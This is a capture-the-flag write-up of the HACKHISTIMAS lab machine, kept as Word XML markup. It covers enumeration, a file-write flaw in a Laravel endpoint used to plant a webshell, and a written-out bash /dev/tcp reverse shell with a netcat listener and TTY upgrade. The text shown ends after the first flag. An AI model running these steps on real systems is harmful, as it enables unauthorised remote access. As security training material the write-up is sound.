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ydukvxes3be"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best part about Hacking Club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6gjyyfwyiu02" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.68gvph1g73q1" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the HACKHISTIMAS machine.If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g98ho0yybz6y"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As a first step, we need to determine which services are running in the background and which ports are open. Therefore,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32k3zi7isfgw" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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25600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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 Port 22 - SSH</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">• Port 80 - HTTP</w:t>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start by taking a look at the web application running on port 80:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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73400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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we do not have anything relevant on the application’s homepage, we can perform fuzzing in order to find possible relevant files or directories. We can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool.</w:t>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65300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/gifts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we have a new page where we can participate in a giveaway for a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flipper Zero</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4">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After clicking the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Participate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> button, we notice that the only change is the button name, from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Participate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Done!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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33700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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70200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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After clicking the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Done!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> button again, but this time with the developer console open in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab, we can observe that a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> request was made to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/log:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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314700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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also notice that the button name changed again → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(you already signed up)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intercept this request using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then send it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</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84400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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D">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After attempting to perform a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter, we received an error. From this, we can infer that the application is built using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laravel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Another interesting detail is that it is using the function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file_put_contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2159000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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Reference about the function:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.w3schools.com/Php/func_filesystem_file_put_contents.asp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Knowing this, we can write a webshell in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Root</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 the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file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parameter, we will specify the path where we want to write our webshell along with its respective name. In the second parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will pass our payload content.</w:t>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16100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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accessing our webshell and passing the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we receive its output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1371600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can obtain a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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xov7q667foy5" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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 -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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need to encode our payload to escape special characters. We can use the website below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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t xml:space="preserve">UrlEncode.org</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Encode a string for use in a URL</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://urlencode.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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54200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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6n488cm0wftl" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat listener to receive the connection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">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562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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51000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48"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sending our encoded reverse shell payload (URL Encode), we receive the reverse connection =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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12900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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134ag7v8vo1t" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to fully interactive TTYs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">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117600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3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-echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3B">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C">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We can find our first flag in the root directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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osqi7abbgvt0" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
